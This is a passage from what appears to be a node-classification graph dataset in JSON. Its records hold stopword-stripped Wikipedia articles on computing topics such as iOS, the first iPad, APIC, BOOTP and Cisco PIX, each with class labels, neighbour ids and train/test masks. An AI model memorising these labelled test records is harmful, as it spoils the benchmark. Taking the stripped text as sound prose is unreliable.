    "text": "IOS_version_history:ios version history ios mobile operating system developed apple inc. iphone ipad ipod touch updates ios released itunes software since ios 5 via over-the-air software updates announcement ios 5 june 6 2011 usb connection itunes longer needed activate ios devices data synchronization happen automatically wirelessly apple icloud service major new ios releases announced yearly apple worldwide developers conference wwdc usually released september year usually coinciding release new iphone models recent stable release ios 12.4 released july 22 2019 june 3 2019 wwdc apple announced ios 13 new features include limited dark interface reworks reminders app redesign maps app recent ios 13 beta release ios 13.0 beta 7 released august 15 2019 june 2007 saw official release eventually became ios – concurrently first iphone ios official name official release iphone software development kit iphone sdk march 6 2008 apple marketing simply stated iphone ran version mac os x made specifically iphone ios introduced named iphone os officially renamed ios june 7 2010 announcement introduction ipad introduction ipad existence ipod touch meant iphone longer device run mobile operating system ios 4 first major ios release reflected name change apple licensed ios trademark cisco systems apple concurrently provides version ios comparable model iphone ipod touch usually devices released calendar year iphone users receive software updates free ipod touch users paid 2.0 3.0 major software updates ios 4 apple longer charges money ipod touch updates apple announced iphone os 1 iphone keynote january 9 2007 released public alongside original iphone june 29 2007 official name given initial release apple marketing literature simply stated iphone runs version apple desktop operating system os x release iphone os 1.1 brought support ipod touch 1st generation iphone os 1.1.5 final version iphone os 1 became unsupported 18 may 2010.what apple announce prototype code name acorn os looked like ipod classic style= background ececec padding:0 0.5em colspan= 5 |table versions iphone os 1.0.x",
    "neighbors": [
      4609,
      10755,
      9732,
      1541,
      1549,
      4111,
      5647,
      7697,
      4114,
      11289,
      8735,
      6186,
      4139,
      6700,
      1074,
      5682,
      8754,
      5176,
      9784,
      9275,
      8253,
      8767,
      576,
      5696,
      8262,
      5191,
      8774,
      1103,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      5733,
      8806,
      3691,
      8304,
      2673,
      2676,
      5749,
      6264,
      6265,
      7292,
      2686,
      6783,
      7806,
      10878,
      2695,
      8842,
      7307,
      2709,
      5784,
      1177,
      4251,
      3228,
      10908,
      3742,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      6834,
      4283,
      3772,
      7869,
      713,
      3790,
      7378,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      7928,
      8441,
      11513,
      1276,
      7420,
      2819,
      5892,
      1290,
      3338,
      9487,
      784,
      9999,
      10512,
      4888,
      5912,
      10023,
      2345,
      4399,
      7983,
      11569,
      7991,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      10052,
      838,
      7496,
      8014,
      2388,
      4957,
      5470,
      6495,
      9063,
      3944,
      4457,
      10602,
      3948,
      4972,
      11629,
      10608,
      5492,
      3462,
      2439,
      6023,
      7561,
      6539,
      7052,
      1428,
      3483,
      2467,
      2979,
      9123,
      11171,
      11173,
      8109,
      2492,
      446,
      7614,
      8640,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      8172,
      2542,
      7154,
      5619,
      2041,
      6651,
      6654,
      4607
    ],
    "mask": "Train"
  },
  {
    "node_id": 3287,
    "label": 8,
    "text": "Tricentis_Tosca:tricentis tosca tricentis tosca software testing tool used automate end-to-end testing software applications developed tricentis tricentis tosca combines multiple aspects software testing test case design test automation test data design generation analytics test guis apis business perspective two frequently-noted technologies used tricentis tosca related model-based testing risk-based testing instead using scripting test automation tricentis tosca applies model-based testing approach creates model application test technical details application test test case logic test data saved separately joined together test execution time element application test changes technical details updated central model since test cases inherit model various test cases test updated element need modified manually reflect change based risk assessment application test ’ requirements tricentis tosca uses risk-based test design suggest effective test cases identify risk contribution test cases also uses variety methodologies equivalence partitioning boundary testing combinatorial methods linear expansion try minimize number test cases increasing risk coverage tests executed tool aggregates risk coverage business technical compliance perspectives tricentis tosca features technologies gui testing api testing mobile testing service virtualization test data design generation business intelligence data warehouse testing exploratory testing sap-certified integration sap solutions used automate testing sap technologies sap s/4hana sap fiori 2.0 successfactors sap crm concur technologies sap ariba sap business information warehouse",
    "neighbors": [
      9780,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3288,
    "label": 0,
    "text": "GloVe_(machine_learning):glove machine learning glove coined global vectors model distributed word representation model unsupervised learning algorithm obtaining vector representations words achieved mapping words meaningful space distance words related semantic similarity training performed aggregated global word-word co-occurrence statistics corpus resulting representations showcase interesting linear substructures word vector space developed open-source project stanford log-bilinear regression model unsupervised learning word representations combines features two model families namely global matrix factorization local context window methods glove used find relations words like synonyms company product relations zip codes cities etc also used spacy model build semantic word embeddings/feature vectors computing top list words match distance measures cosine similarity euclidean distance approach also used word representation framework online offline systems designed detect psychological distress patient interviews",
    "neighbors": [
      3288,
      4468,
      7910
    ],
    "mask": "None"
  },
  {
    "node_id": 3289,
    "label": 6,
    "text": "MetaSAN:metasan metasan cross-platform storage area network san management software developed sold tiger technology product ceased developed company 2014 however supported end 2016. metasan enables one share one physical virtual disk devices multiple hosts using fibre channel iscsi ethernet infiniband interconnect every computer participating san could read write storage volume folder time metasan file system distributed lock manager existing ntfs hfs+ file systems hardware agnostic worked off-the-shelf storage networking components offered per-node bandwidth control aimed enable fair distribution available storage bandwidth cross-platform setup metasan provided file-system translation services allowed mac windows linux workstations transparently access non-native volumes arbitrate accesses shared storage device one computer elected master san computer became metadata controller mdc computers clients san communicated sent metadata requests mdc lan request acknowledged clients could access storage device directly metasan setup member san could act mdc default first computer boot became mdc possible define priorities assign dedicated computer task metasan superseded tiger store http //www.tiger-technology.com/products/tiger-series/tiger-store/",
    "neighbors": [
      4615,
      5647,
      1042,
      11283,
      10780,
      3618,
      9762,
      11301,
      6697,
      6700,
      1581,
      1074,
      10817,
      582,
      1098,
      5713,
      3670,
      4184,
      2141,
      4702,
      8798,
      10338,
      2149,
      8296,
      5225,
      8299,
      8303,
      6771,
      2676,
      6265,
      8315,
      636,
      639,
      641,
      7812,
      8326,
      3719,
      10888,
      11402,
      651,
      6797,
      2193,
      2195,
      2196,
      8852,
      7318,
      3228,
      1694,
      2207,
      5292,
      8877,
      1710,
      3250,
      3766,
      7863,
      2232,
      9910,
      9912,
      9406,
      6849,
      713,
      9418,
      10957,
      3790,
      9430,
      4316,
      1761,
      231,
      4841,
      9451,
      10989,
      2288,
      7928,
      8441,
      3326,
      7422,
      11521,
      7938,
      2819,
      1796,
      4360,
      1801,
      8976,
      3857,
      10512,
      1813,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      823,
      6462,
      321,
      4933,
      9035,
      11605,
      2391,
      11103,
      4457,
      8576,
      3463,
      9100,
      4493,
      8080,
      11155,
      9109,
      4505,
      1439,
      4515,
      3496,
      4011,
      9646,
      9660,
      7615,
      7106,
      5067,
      7118,
      8147,
      9173,
      3035,
      4571,
      5600,
      4068,
      5093,
      487,
      4074,
      5612,
      10221,
      5103,
      11257,
      7163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3290,
    "label": 4,
    "text": "Hacking_tool:hacking tool hacking tool program designed assist hacking piece software used hacking purposes another example hacking tool computer worm malicious programs detect vulnerabilities operating systems worms however malicious nachi worms actually fixed operating system vulnerabilities downloading installing security patches microsoft website although much said threats linux system exist could increase future one biggest threats linux system given so-called rootkits programs special privileges able hide presence system administrator",
    "neighbors": [
      5636,
      10756,
      2060,
      3473,
      8978,
      4883,
      3604,
      10392,
      7449,
      5404,
      5284,
      939,
      4140,
      7855,
      7983,
      1970,
      7739,
      6588,
      9791,
      3525,
      4813,
      4435,
      7515,
      4956,
      733,
      2275,
      107,
      3310,
      2807,
      2041,
      7547,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3291,
    "label": 1,
    "text": "Tanzania_Zanzibar_International_Register_of_Shipping:tanzania zanzibar international register shipping tanzania zanzibar international register shipping tzirs body appointed tanzania zanzibar government register ships tanzanian flag",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3292,
    "label": 4,
    "text": "Paping:paping paping pronounced pah ping computer network administration utility used test reachability host internet protocol tcp/ip network measure time takes connect specified port name play word ping another computer network administration utility icmp used identify operating system remote machine sometimes blocked icmp blocked ping used identify service responding publicly available services must keep relevant tcp udp ports open paping attempt make connections ports determine service responding similar utilities nmap allow range ports scanned however allow repetitively scan ports paping operates attempting connect internet protocol tcp/ip port target process measures time taken connection established records connection failures results test printed form statistical summary connections made including minimum maximum mean connection times paping cross-platform software currently supporting windows linux april 2013 project appears abandoned new fixes versions produced following sample output paping en.wikipedia.org tcp/ip port 80 http linux host",
    "neighbors": [
      5472,
      5612,
      7983,
      2739,
      8692,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3293,
    "label": 2,
    "text": "IPad_(1st_generation):ipad 1st generation first-generation ipad tablet computer designed marketed apple inc. first ipad line device features apple a4 processor 9.7 touchscreen display certain variants capability accessing cellular networks using ios operating system ipad play music send receive email browse web functions include ability play games access references gps navigation software social network services enabled downloading apps device announced unveiled january 27 2010 media conference april 3 2010 wi-fi variant device released united states followed release wi-fi cellular variant april 30 may 28 released australia canada france japan italy germany spain switzerland united kingdom device received primarily positive reviews various technology blogs publications reviewers praised device wide range capabilities labelled competitor laptops netbooks aspects criticized including closed nature operating system lack support adobe flash multimedia format first 80 days three million ipads sold launch ipad 2 apple sold 15 million ipads march 2 2011 apple announced ipad 2 reduced price first-generation ipad apple co-founder steve jobs stated 1983 speech company ’ apple ’ first tablet computer newton messagepad 100 introduced 1993 led creation arm6 processor core acorn computers apple also developed prototype powerbook duo-based tablet penlite decided sell order avoid hurting messagepad sales apple released several newton-based pdas final one messagepad 2100 discontinued 1998 apple reentered mobile-computing market 2007 iphone smaller yet announced ipad featuring camera mobile phone pioneered multitouch finger-sensitive touchscreen interface apple ’ ios mobile operating system late 2009 ipad release rumored several years speculation mostly talked “ apple ’ tablet ” specific names included itablet islate actual name reportedly homage star trek padd fictional device similar appearance ipad ipad announced january 27 2010 jobs apple press conference yerba buena center arts san francisco jobs later said apple began developing ipad iphone temporarily shelved effort upon realizing ideas would work well mobile phone ipad ’ internal codename k48 revealed court case surrounding leaking ipad information launch apple began taking pre-orders ipad us customers march 12 2010 major change device announcement available pre-order change behavior side switch sound muting screen rotation lock wi-fi version ipad went sale united states april 3 2010 wi-fi 3g version released april 30 3g service ipad united states provided initially sold two prepaid contract-free data plan options one unlimited data 250 mb per month half price june 2 2010 announced effective june 7 unlimited plan would replaced new customers 2 gb plan slightly lower cost existing customers would option keep unlimited plan plans activated ipad cancelled time ipad initially available purchase apple ’ online store retail locations since become available retailers including amazon walmart network operators ipad launched countries including australia canada france germany japan united kingdom may 28 online pre-orders countries began may 10 apple released ipad hong kong ireland mexico new zealand singapore july 23 2010 israel briefly prohibited importation ipad concerns wi-fi might interfere devices september 17 2010 ipad officially launched china ipad originally shipped iphone os 3.2 september 1 2010 announced ipad would get ios 4.2 november 2010 fulfill apple released ios 4.2.1 public november 22 comes several applications including safari mail photos video ipod itunes app store maps notes calendar contacts several improved versions applications developed iphone mac ipad syncs itunes mac windows pc apple ported iwork suite mac ipad sells pared-down versions pages numbers keynote apps app store although ipad designed replace mobile phone user use wired headset built-in speaker microphone place phone calls wi-fi 3g using voip application october 12 2011 ios 5 released various ios devices including first-generation ipad downloadable itunes update reported contain hundreds new features tweaks including twitter integration notification center imessage feature allows users send messages multimedia files users ios os x operating system apple computers icloud ios app apple-provided internet storage service allows users sync backup user data settings to/from devices also made available update june 11 2012 announced ios 6 would released first-generation ipad making ios 5.1.1 final operating system officially available device first-generation ipad features apple a4 soc comprises 1 ghz processor 256 mb ram powervr sgx535 gpu four physical switches ipad including home button near display returns user main menu three plastic physical switches sides wake/sleep volume up/down plus software-controlled switch whose function changed software updates originally switch locked screen current orientation ios 4.2 changed mute switch moving rotation lock function onscreen menu ios 4.3 update setting added allow user specify whether side switch used rotation lock mute unlike successors first-generation ipad cameras ipad touchscreen display 1,024 768 pixel liquid crystal display diagonal fingerprint- scratch-resistant glass result device screen dimensions resolution screen pixel density 132 ppi display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense ipad orientation switch portrait landscape modes unlike iphone ipod touch built-in applications work three orientations portrait landscape-left landscape-right ipad built-in applications support screen rotation four orientations including upside-down consequently device intrinsic native orientation relative position home button changes ipad equipped 16 gb 32 gb 64 gb solid-state flash memory program data storage furthermore device available two connectivity options wi-fi wi-fi cellular unlike successors wi-fi cellular variant first-generation ipad could support carriers utilized gsm/umts standards compatible cdma networks however like successors assisted gps services supported bluetooth also available models weight first-generation ipad varied dependent upon connectivity options chosen wi-fi variant weighs whereas variant wi-fi cellular weighs dimensions however identical across entire range variants measuring 9.56×7.47×0.50 243×190×13 mm apple offers several ipad accessories adapters proprietary 30-pin dock connector ipad port besides headphone jack dock holds ipad upright angle dock connector audio line-out port generation ipad requires corresponding dock dock included physical keyboard supported original ipad generations compatible bluetooth keyboards also work macs pcs ipad charged 10 w standalone power adapter also compatible ipods iphones media reaction announcement device device mixed media noted thousands people queued first day sale number countries many waited claiming worth walt mossberg wall street journal wrote software stupid meaning hardware features build less important ipad success software user interface first impressions largely positive mossberg also called price modest device capabilities praised ten-hour battery life others including pc advisor sydney morning herald wrote ipad would also compete proliferating netbooks use microsoft windows base model price 499 lower pre-release estimates wall street analysts apple competitors expecting much higher entry price point media also praised quantity applications well bookstore media applications contrast sources including bbc criticized ipad closed system mentioned ipad faces competition android-based tablets however time first-generation ipad launch yahoo news noted android tablet os known honeycomb open source fewer apps available ipad although later google released source code honeycomb independent criticized ipad readable bright light paper praised able store large quantities books uk release daily telegraph said ipad lack adobe flash support annoying ipad selected time magazine one 50 best inventions year 2010 popular science chose top gadget behind overall best new 2010 winner groasis waterboxx 300,000 ipads sold first day availability may 3 2010 apple sold million ipads half time took apple sell number original iphones passing one million mark continued selling rapidly reaching 3 million sales 80 days financial conference call october 18 2010 steve jobs announced apple sold ipads macs fiscal quarter total apple sold 15 million first-generation ipads prior launch ipad 2 – tablet pcs combined since ipad release reaching 75 tablet pc sales end 2010 cnet criticized ipad apparent lack wireless sync portable devices microsoft zune number years walt mossberg called pretty close laptop killer david pogue new york times wrote dual review one part technology-minded people part non-technology-minded people former section notes laptop offers features cheaper price ipad review latter audience however claims readers like concept device understand intended uses enjoy using device pc magazine tim gideon wrote winner undoubtedly driving force shaping emerging tablet landscape michael arrington techcrunch said ipad beats even optimistic expectations new category device also replace laptops many people pc world criticized ipad file sharing printing abilities arstechnica critically noted sharing files computer one least favorite parts ipad experience",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      5681,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      6797,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      11062,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6537,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3294,
    "label": 3,
    "text": "Advanced_Programmable_Interrupt_Controller:advanced programmable interrupt controller computing intel advanced programmable interrupt controller apic family interrupt controllers name suggests apic advanced intel 8259 programmable interrupt controller pic particularly enabling construction multiprocessor systems one several architectural designs intended solve interrupt routing efficiency issues multiprocessor computer systems apic split architecture design local component lapic usually integrated processor optional i/o apic system bus first apic 82489dx discrete chip functioned local i/o apic 82489dx enabled construction symmetric multiprocessor smp systems intel 486 early pentium processors example reference two-way 486 smp system used three 82489dx chips two local apics one i/o apic starting p54c processor local apic functionality integrated intel processors silicon first dedicated i/o apic intel 82093aa intended piix3-based systems two components intel apic system local apic lapic i/o apic one lapic cpu system first implementation 82489dx lapic discrete circuit opposed thereafter implementation intel processors silicon typically one i/o apic peripheral bus system original system designs lapics i/o apics connected dedicated apic bus newer systems use system bus communication apic components apic whether discrete chip integrated cpu version register containing four-bit version number specific apic implementation example 82489dx apic version number 0 version 1 assigned first generation local apics integrated pentium 90 100 processors systems containing 8259 pic 8259 may connected lapic system bootstrap processor bsp one system i/o apics logically however 8259 connected given time first-generation intel apic chip 82489dx meant used intel 80486 early pentium processors actually external local i/o apic one circuit intel mp 1.4 specification refers discrete apic contrast integrated apic found pentium processors 82489dx 16 interrupt lines also quirk could lose isa interrupts multiprocessor 486 system cpu paired 82489dx additionally supplementary 82489dx used i/o apic 82489dx could emulate 8259a xt-pic also included physical chips backwards compatibility 82489dx packaged 132-pin pqfp local apics lapics manage external interrupts specific processor smp system addition able accept generate inter-processor interrupts ipis lapics lapics may support 224 usable interrupt vectors i/o apic vector numbers 0 31 0 255 reserved exception handling x86 processors intel processors starting p5 microarchitecture p54c built-in local apic however local apic disabled p5 processor re-enabled software limitation longer exists p6 processors later ones single-processor systems major advantage local apic pci cards longer need interrupts mapped isa interrupts use virtual pci irqs 15 resulting fewer conflicts better performance microsoft family operating systems windows xp first properly make use virtual irqs provided local apic partial support present windows 2000 windows 2000 spreading pci card interrupts virtual irq happens machine also i/o apic microsoft blamed windows 2000 implementation information received intel supposedly promising future systems would contain i/o apic well something retrospect happen microsoft document era even claimed without i/o apic system local apics useless situation windows 2000 revert using 8259 pic sudden widespread use local apic windows xp expose number bugs various bios implementations particular microsoft forced retain pci irq stacking behavior machine cardbus controller without i/o apic message signaled interrupts msi feature pci 2.2 later specifications used without local apic enabled use msi obviates need i/o apic additionally 224 interrupts supported msi mode irq sharing allowed another advantage local apic also provides high-resolution order one microsecond better timer used interval one-off mode apic timer initial acceptance woes microsoft document 2002 advocated adoption high precision event timer instead criticized lapic timer poor resolution stating clocks silicon sometimes buggy nevertheless apic timer used example windows 7 profiling enabled windows 8 circumstances windows 8 claimed exclusive rights timer also used programs like cpu-z microsoft windows apic timer shareable resource aperiodic interrupts offered apic timer used linux kernel 2.6.18 onwards implement tickless kernel feature legacy 8253 programmable interval timer longer used tickless kernels vmware document notes software reliable way determine frequency generally way determine local apic timer ’ frequency measure using pit cmos timer yields approximate result i/o apics contain redirection table used route interrupts receives peripheral buses one local apics first-generation dedicated i/o apic 82093aa support 24 interrupt lines packaged 64-pin pqfp 82093aa normally connected piix3 used integrated legacy 8259 pics according 2009 intel benchmark using linux i/o apic reduced interrupt latency factor almost three relative 8259 emulation xt-pic using msi reduced latency even factor nearly seven relative xt-pic baseline xapic introduced pentium 4 x2apic recent generation intel programmable interrupt controller introduced nehalem microarchitecture november 2008 major improvements x2apic address number supported cpus performance interface x2apic uses 32 bits address cpus allowing address 2 − 1 cpus using physical destination mode logical destination mode works differently introduces clusters using mode one address 2 − 16 processors x2apic architecture also provides backward compatibility modes original intel apic architecture introduced pentium/p6 xapic architecture introduced pentium 4 improved interface reduces number needed apic register access sending inter-processor interrupts ipis advantage qemu emulate x2apic older processors physically support going back conroe even amd opteron g-series processors neither natively support x2apic apicv intel brand name hardware virtualization support aimed reducing interrupt overhead guests apicv introduced ivy bridge-ep processor series sold xeon e5-26xx v2 launched late 2013 xeon e5-46xx v2 launched early 2014 amd announced similar technology called avic available family 15h models 6xh carrizo processors newer number known bugs implementations apic systems especially concern 8254 connected defective bioses may set interrupt routing properly provide incorrect acpi tables intel multiprocessor specification mps tables apic also cause system failure operating system support properly older operating systems i/o local apics often disabled possible anymore due prevalence symmetric multiprocessor multi-core systems bugs firmware operating systems rare occurrence amd cyrix proposed somewhat similar-in-purpose openpic architecture supporting 32 processors least declarative support ibm compaq around 1995 x86 motherboard released openpic however openpic failure x86 market amd licensed intel apic amd athlon later processors ibm however developed multiprocessor interrupt controller mpic based openpic register specifications mpic used powerpc based designs including ibm instance rs/6000 systems also apple late power mac g5s",
    "neighbors": [
      6153,
      4491,
      6924,
      4237,
      4622,
      7313,
      9105,
      533,
      6806,
      1176,
      5529,
      9369,
      9500,
      2719,
      1058,
      7463,
      1972,
      823,
      3255,
      9655,
      6971,
      1085,
      8125,
      5823,
      704,
      833,
      6339,
      9541,
      3272,
      6730,
      2379,
      7755,
      4173,
      3537,
      2514,
      3027,
      2516,
      5457,
      6911,
      4695,
      7377,
      602,
      2523,
      7387,
      8795,
      7783,
      9959,
      1515,
      9582,
      499,
      3317,
      8700,
      3323,
      1660,
      1791
    ],
    "mask": "Test"
  },
  {
    "node_id": 3295,
    "label": 7,
    "text": "IBM_Websphere_Business_Events:ibm websphere business events websphere business events ibm implementation event-processing engine event processing involves altering existing server software organization emit events small messages whenever notable event occurs event-processing software software monitor events look certain patterns interest useful prevention credit card fraud giving executives high-level view going company e.g share price drops extended period time detailed description see complex event processing software components following details websphere business events released june 2008 based upon acquisition aptsoft software",
    "neighbors": [
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3296,
    "label": 6,
    "text": "Info-ZIP:info-zip info-zip set open-source software handle zip archives circulation since 1989 consists 4 separately-installable packages zip unzip command-line utilities wiz maczip graphical user interfaces archiving programs microsoft windows classic mac os respectively info-zip zip unzip ported dozens computing platforms unzip web page describes unzip third portable program world surpassed hello world c-kermit possibly linux kernel zip unzip programs included linux unix distributions info-zip zip unzip addition info-zip releases parts info-zip including zlib used numerous file archivers programs many info-zip programmers also involved projects closely related deflate compression algorithm png image format zlib software library unzip package also includes three additional utilities zip package includes three additional utilities unzip 1.0 march 1989 released samuel m. smith written pascal c. pascal abandoned soon unzip 2.0 september 1989 released samuel m. smith included support unimploding method 6 introduced pkzip 1.01 george sipe created unix version unzip 2.0a december 1989 released carl mascott john cowan spring 1990 info-zip formed mailing list simtel20 released unzip 3.0 may 1990 became first public release info-zip group unzip 4.0 december 1990 adds support central directory within .zip archive unzip 5.0 august 1992 introduces support deflate method 8 compression method used pkzip 1.93a method 8 become de facto base standard zip archives 1994 1995 info-zip turned corner effectively became de facto zip program non-ms-dos systems huge number ports released year including numerous minicomputers mainframes practically every microcomputer ever developed unzip 5.41 april 2000 relicensed info-zip license unzip 5.50 february 2002 adds support deflate64 method 9 decompression unzip 6.0 adds support zip64 .zip archive bzip2 method 12 decompression support bzip2-style compression also zip 3.0f beta zip 1.9 august 1992 introduces support deflate method 8 compression method method 8 become de facto base standard zip archives zip 2.3 december 1999 first info-zip archiver tool new bsd-like info-zip license zip 3.0 2008-07-07 supports zip64 .zip archive 65536 files per archive multi-part archive bzip2 compression unicode utf-8 filename partial comment unix 32-bit uids/gids wiz 4.0 november 1997 released info-zip wiz 5.01 april 2000 relicensed info-zip license maczip 1.05 july 2000 released info-zip license maczip 1.06 released february 2001 written dirk hasse",
    "neighbors": [
      3969,
      5380,
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      546,
      3114,
      10027,
      4780,
      7983,
      2864,
      950,
      6713,
      2755,
      11076,
      3142,
      7366,
      1352,
      4296,
      8524,
      1101,
      8909,
      9166,
      10317,
      4561,
      722,
      8147,
      10575,
      10971,
      11614,
      1631,
      3296,
      9953,
      5858,
      10851,
      6759,
      9320,
      7529,
      4459,
      237,
      1646,
      7667,
      6389,
      7286,
      4089,
      8700,
      2045,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 3297,
    "label": 5,
    "text": "Bootstrap_Protocol:bootstrap protocol bootstrap protocol bootp computer networking protocol used internet protocol networks automatically assign ip address network devices configuration server bootp originally defined rfc 951 computer connected network powered boots operating system system software broadcasts bootp messages onto network request ip address assignment bootp configuration server assigns ip address based request pool addresses configured administrator bootp implemented using user datagram protocol udp transport protocol port number 67 used dhcp server receive client requests port number 68 used client receive dhcp server responses bootp operates ipv4 networks historically bootp also used unix-like diskless workstations obtain network location boot image addition ip address assignment enterprises used roll pre-configured client e.g. windows installation newly installed pcs originally requiring use boot floppy disk establish initial network connection manufacturers network cards later embedded protocol bios interface cards well system boards on-board network adapters thus allowing direct network booting parts bootp effectively superseded dynamic host configuration protocol dhcp adds feature leases parts bootp used provide service dhcp protocol dhcp servers also provide legacy bootp functionality bootp first defined september 1985 rfc 951 replacement reverse address resolution protocol rarp published rfc 903 june 1984 primary motivation replacing rarp bootp rarp link layer protocol made implementation difficult many server platforms required server present individual ip subnet bootp introduced innovation relay agents forwarded bootp packets local network using standard ip routing one central bootp server could serve hosts many subnets case 1 client server network case 2 client server different networks",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      6797,
      3218,
      3731,
      5397,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      10926,
      7984,
      562,
      2996,
      9909,
      6651,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      328,
      8265,
      2509,
      4687,
      6993,
      5843,
      10325,
      2904,
      5469,
      5470,
      5471,
      5472,
      10723,
      11108,
      10341,
      10344,
      11112,
      1515,
      367,
      8432,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 3298,
    "label": 4,
    "text": "David_Venable:david venable david dave venable born january 11 1978 little rock arkansas former intelligence officer united states national security agency current cyber security professional businessman author speaker topics cyber security cyberwarfare international security also developed security-related internet protocols dave venable grew little rock arkansas arkansas later attended university arkansas majoring mathematics college venable joined united states air force studied korean defense language institute monterey california department defense educational research institution provides linguistic cultural instruction dod federal agencies venable also pursued graduate education mathematics university texas international relations harvard university 2005 venable served several intelligence roles national security agency including computer network exploitation cyberwarfare information operations digital network intelligence support global anti-terrorism operations also taught subjects serving adjunct faculty national cryptologic school school within national security agency provides training members united states intelligence community leaving federal service venable founded served ceo vanda security dallas-based security consultancy ultimately became security professional services practice masergy communications venable currently serves vice president cyber security venable regularly speaks industry government conferences including black hat briefings warsaw security forum serves cyber security expert think tanks policy research institutes serves colony texas technology board venable frequently contributes appears forbes bbc harvard business review bloomberg businessweek informationweek idg connect media outlets matters pertaining cyber security cyberwarfare international security",
    "neighbors": [
      9688,
      2275,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 3299,
    "label": 4,
    "text": "Cisco_PIX:cisco pix cisco pix private internet exchange popular ip firewall network address translation nat appliance one first products market segment 2005 cisco introduced newer cisco adaptive security appliance cisco asa inherited many pix features 2008 announced pix end-of-sale pix technology sold blade firewall services module fwsm cisco catalyst 6500 switch series 7600 router series reached end support status september 26 2007 pix originally conceived early 1994 john mayes redwood city california designed coded brantley coile athens georgia pix name derived creators aim creating functional equivalent ip pbx solve then-emerging registered ip address shortage time nat investigated viable approach wanted conceal block blocks ip addresses behind single multiple registered ip addresses much pbxs internal phone extensions began rfc 1597 rfc 1631 discussed now-familiar rfc 1918 yet submitted design testing carried 1994 john mayes brantley coile johnson wu network translation inc. brantley coile sole software developer beta testing pix serial number 000000 completed first customer acceptance december 21 1994 kla instruments san jose california pix quickly became one leading enterprise firewall products awarded data communications magazine hot product year award january 1995 shortly cisco acquired network translation november 1995 mayes coile hired two longtime associates richard chip howes pete tenereillo shortly acquisition 2 longtime associates jim jordan tom bohannon together continued development finesse os original version cisco pix firewall known pix classic time pix shared code another cisco product localdirector january 28 2008 cisco announced end-of-sale end-of-life dates cisco pix security appliances software accessories licenses last day purchasing cisco pix security appliance platforms bundles july 28 2008 last day purchase accessories licenses january 27 2009 cisco ended support cisco pix security appliance customers july 29 2013 may 2005 cisco introduced asa combines functionality pix vpn 3000 series ips product lines asa series devices run pix code 7.0 later pix os release 7.x pix asa use software images beginning pix os version 8.x operating system code diverges asa using linux kernel pix continuing use traditional finesse/pix os combination pix runs custom-written proprietary operating system originally called finese fast internet service executive software known simply pix os though classified network-layer firewall stateful inspection technically pix would precisely called layer 4 transport layer firewall access restricted network layer routing socket-based connections port ip address port communications occur layer 4 default allows internal connections outbound traffic allows inbound traffic response valid request allowed access control list acl conduit administrators configure pix perform many functions including network address translation nat port address translation pat well serving virtual private network vpn endpoint appliance pix became first commercially available firewall product introduce protocol specific filtering introduction fixup command pix fixup capability allows firewall apply additional security policies connections identified using specific protocols protocols specific fixup behaviors developed include dns smtp dns fixup originally implemented simple effective security policy allowed one dns response dns server internet known outside interface dns request client protected known inside interface inspect superseded fixup later versions pix os cisco pix also one first commercially available security appliances incorporate ipsec vpn gateway functionality administrators manage pix via command line interface cli via graphical user interface gui access cli serial console telnet ssh gui administration originated version 4.1 several incarnations cisco acquired pix network translation cli originally align cisco ios syntax starting version 7.0 configuration became much ios-like original nti pix pix classic cases sourced oem provider appro flash cards early encryption acceleration cards pix-pl pix-pl2 sourced productivity enhancement products pep later models cases cisco oem manufacturers pix constructed using intel-based/intel-compatible motherboards pix 501 used amd 5x86 processor standalone models used intel 80486 pentium iii processors pix boots proprietary isa flash memory daughtercard case nti pix pix 